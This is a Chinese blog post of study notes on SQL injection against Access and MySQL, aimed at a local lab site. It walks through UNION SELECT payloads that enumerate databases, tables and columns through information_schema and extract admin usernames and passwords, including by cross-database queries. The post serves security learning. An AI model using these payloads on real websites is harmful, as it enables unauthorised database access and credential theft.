Web安全--SQL注入--MYSQL跨库--ACCESS偏移

最新推荐文章于 2023-10-01 21:29:19 发布
最新推荐文章于 2023-10-01 21:29:19 发布
阅读量505 收藏
点赞数 1
文章标签: web安全 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68243135/article/details/127884373
版权

知识点:

1.脚本代码与数据库前置知识

2.Access数据库注入

3.MYSQL数据库注入

首先了解一下数据库的前置知识:SQL注入漏洞产生原理分析?产生在数据库里边,通过脚本代码连接执行。SQL注入漏洞危害利用分析-脚本代码与数据库操作流程-数据库名,表名,列名,数据-数据库类型,数据库用户,用户权限。

产生的原因:脚本代码在实现代码与数据库进行数据通讯时(从数据库取出相关数据进行页面显示),将定义的SQL语句进行执行执行查询语句时。其中的SQL语句能通过参数传递自定义值来控制SQL语句,从而执行恶意的SQL语句,可以实现查询其他数据(数据库中的敏感数据,例如管理员账号密码)。这个过程就叫SQL注入漏洞。

漏洞产生的根本条件:可控变量和特定函数 

如果下面的URL地址测试注入判断id有注入,手工测试该如何进行?

http://192.168.46.160:85/Production/PRODUCT.asp?id=1513&page=1

http://192.168.46.160:85/Production/PRODUCT.asp?page=1&id=1513

Production/PRODUCT.asp?id=1513 注入语句&page=1 对

Production/PRODUCT.asp?id=1513&page=1 注入语句 错

SQL注入攻击流程:

1.猜测数据库类型(因为每个数据库的sql语句是不一样的,如果我们在Access数据库使用Mysql语法显然这是无效的)

类型:MySQL、Access等

2.当我们知道数据库的类型后,我们根据类型来选择挖掘漏洞的思路

Access数据库是独立存在的--结构:数据库名--表名--列名--数据

Mysql数据库为统一管理,最高数据库用户为root用户,每个人管理自己的数据库,我是谁就管理谁的数据库,结构:数据库A=网站A=数据库用户A--表明--列名--数据、数据库B=网站B=数据库用户B、数据库C=网站C=数据库用户C,数据库BC同A一样。为了网站和数据库的安全性,Mysql内置有Root最高用户,划分等级,每个用户管理自己的数据库,这样保证无不关联,从而不会影响到其他数据库的运行。

Mysql两种思路:

1.非root的注入攻击:常规的猜解(说白了不是root用户意义不大)

2.root用户的注入攻击:文件读写操作,跨库查询注入等

黑盒测试中可以采用user()获取当前用户权限,白盒测试看直连用户即可!

Mysql特性:

MYSQL5.0以上版本:自带的数据库名information_schema

information_schema:存储数据库下的数据库名及表名,列名信息的数据库

information_schema.tables:记录表名信息的表

information_schema.columns:记录列名信息表

information_schema.tables

获取相关数据:

1、数据库版本-看是否符合information_schema查询  -version()---5.5.532

2、数据库用户-看是否符合ROOT型注入攻击-user() ---root@localhost

3、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os---win

4、数据库名字-为后期猜解指定数据库下的表,列做准备-database()---syguestbook

ROOT类型攻击-猜解数据,文件读写,跨库查询,sql语句的点代表下一级

 

简单的数据猜解:

获取syguestbook数据库下面的表名信息:

UNION SELECT table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema='syguestbook'

如果不显示全称就加上group_concat()

获取表名sy_adminuser的列名信息:

UNION SELECT column_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name='sy_adminuser' and table_schema='syguestbook'划颜色部分可以不写,但是可能会有其它数据库的表明重复,造成混乱。

获取指定数据:

UNION SELECT username,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from sy_adminuser

跨库注入:实现当前网站跨库查询其他数据库对应网站的数据

root用户可以管理所有的数据库,其他账户只能单独管理自己的数据库

获取当前mysql下的所有数据库名(schemata是存储所有数据库名字的)

UNION SELECT schema_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.schemata

获取数据库名xhcms下的表名信息

UNION SELECT table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema='xhcms'

获取数据库名xhcms下的表manage下的列名信息:

UNION SELECT column_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name='manage' and table_schema='xhcms'

获取指定数据:

UNION SELECT user,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from xhcms.manage

为什么加xhcms.manage?

因为数据库的默认文件已经连接道syguestbook数据库了,他们两个是同一级的,所以不加xhcms就会在syguestbook中查询表。

LaPluie985
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入跨库注入
剁椒鱼头没剁椒的博客
02-27 1155
该部分补充之前发布的SQL注入基础原理与案例中未提到的跨库注入。后续也会在之前发布过的文章中再逐渐补充未提到内容。参考文章跨库注入首先需要明确注入点的权限,若不是root权限或者管理员权限,那么无法执行跨库注入,只有高权限才能执行跨库注入。简单来说,跨库注入就是在同一个数据库管理系统中,在某一个点存在SQL注入,而通过这点查询到,该权限为Root权限,那么就可以使用这种方式去操作同数据库下的其它网站数据库,这样就实现的跨库注入。
SQL高权限注入(附实例)-跨库注入-文件读写操作-魔术引号-防注入方法
ran的博客
01-13 551
此次要进行跨库注入的目标是“Pikachu漏洞联系平台”,而上一步获取到的所有数据库里可以发现有一个数据库名称为“pikachu”,不难判断出此数据库即为跨库注入的目标的数据库。比如下面的数据库A是“root用户”,就可以对相关的网站B、网站C进行跨库注入,但是想要实现跨库注入,首先就需要知道数据库B、数据库C的数据库名称。进行上述操作时,文件路径里的斜杠最好使用“/”或者“\\”,而不是使用默认的“\”,因为在很多编程语言中“\n”代表换行的意思,可能因此会发生错误。
【网络安全-SQL注入(3)】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用
最新发布
m0_67844671的博客
10-01 1042
本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
SQL注入access数据库
KHOST的博客
04-23 405
首先是sql注入产生的条件: 1.参数的传递 2.参数值可以带入到数据库 我这里是本地搭建的环境,接另外一种方法注入 手工注入值半猜解 第一步 判断是否可以注入 URL:http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and 1=1 返回正常 and 1=2 返回不正常 第二步 猜解数据库表名 语句...
SQL手工注入漏洞测试(Access数据库)
天天学安全专属博客
11-10 775
SQL手工注入漏洞测试(Access数据库)和Access数据库注入
数据库分页技术-C3p0手动封装
12-21
数据库分页技术是大型Web应用中不可或缺的一部分,它有效地帮助用户在海量数据中浏览和查找信息,而不会一次性加载所有数据导致性能下降。本实例主要介绍了如何利用C3p0数据库连接池配合分层技术和JSTL(JavaServer ...
2021-2022计算机二级等级考试试题及答案No.3276.docx
11-01
3. **MySQL连接函数**:`mysql_connect()`用于建立非持久连接,这种连接在会话结束后自动关闭,可以通过`mysql_close()`显式关闭。而`mysql_pconnect()`建立的是持久连接,即使会话结束,连接依然保持,下次请求时可...
2021-2022计算机二级等级考试试题及答案No.19913.docx
10-31
9. Access支持的查询类型包括选择查询、交叉表查询、参数查询、SQL查询和动作查询(A选项正确)。 10. 在MySQL中,CREATE命令用于创建数据库对象,如表、索引等。 11. 多个窗口操作中,只有一个是当前窗口,它可以...
2021-2022计算机二级等级考试试题及答案No.19453.docx
10-31
21. MySQLMySQL是一种跨平台的关系型数据库管理系统,适用于各种规模的应用系统。 22. 数据库操作:在数据库中,`LIST NEXT 5`会显示当前记录之后的5条记录,所以序号是11到15。 23. CSS边框宽度:CSS的`border-...
2021-2022计算机二级等级考试试题及答案No.10047.docx
10-25
11. **MySQL创建数据库对象**:在MySQL中,CREATE命令用于创建数据库对象,如表、视图、索引等。 12. **冯·诺依曼体系结构**:现代计算机的基础,存储程序控制原理是指程序和数据都存储在内存中,由控制器按照顺序...
MySQL跨库注入
一个普普通通的博客
03-01 373
Mysql跨库注入
class2 跨库注入
qq_46185846的博客
02-18 205
跨库注入,新增知识点information_schema.schemata,存储所有的数据库信息 如果要应用跨库注入,有一个条件,那就是当前数据库用户必须为root用户,才可以对整个数据库进行操作 确定用户: user()确定用户 如果回显为root@localhost或者root@127.0.0.1只要@号前面为root,则代表该数据库用户为root 跨库注入过程: 第一步: 获取当前所有的数据...
小迪笔记____
kkkkkllllllll的博客
07-01 4357
小迪笔记
Web漏洞-access注入、Sql Sever(Mssql)注入、PostgreSql注入、Orache注入、MongoDB注入、Oracle注入-SQLmap使用教程-附实例
ran的博客
01-15 1796
Mongodb的查询文档方式与其他的数据库略微不同,当进行条件查询的时候,mysql是用where,而mongodb是以键值对形式(类似于JSON)进行查询的。这里是一个跟Mysql数据库的一个不同的位置,PostgreSql数据库union select后用。因为access数据库不包含数据库名,所以直接从表名开始查询。最后将password解密后进入后台复制KEY提交即可。”,所以在注入过程中需要我们进行暴力猜解。------>注意与Mysql进行对比。在进行注入时,要注意对。sqlmap使用教程。
墨者学院02 SQL手工注入漏洞测试(Access数据库)
weixin_42789937的博客
01-24 307
墨者学院02 SQL手工注入漏洞测试(Access数据库),是一个较为详细的WP~
Sql注入详解(原理篇)
Naive的博客
09-11 9467
SQL 注入漏洞非常复杂,区分各种数据库类型,提交方法,数据类型等注入,同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
高权限注入&跨库注入
hibugs
04-13 377
上篇文章中我们讲述了如何进行手工注入,也通过墨者学院的靶场,真实的感受了SQL注入的感觉。这篇文章我们将继续介绍SQL注入
Access数据库中的SQL注入(无waf)
kali_boy的博客
11-27 3224
一.关于Access数据库和简单注入用到的SQL 1.access数据库 Microsoft Office Access是由微软发布的关系数据库管理系统,也就是说在我们的
SQL注入实战:sqli-labs实验详解
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意SQL代码来获取、修改、删除数据库中的敏感信息,甚至完全控制数据库服务器。在sqli-labs实验中,我们可以系统地学习这一攻击手段。 首先,我们需要识别...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值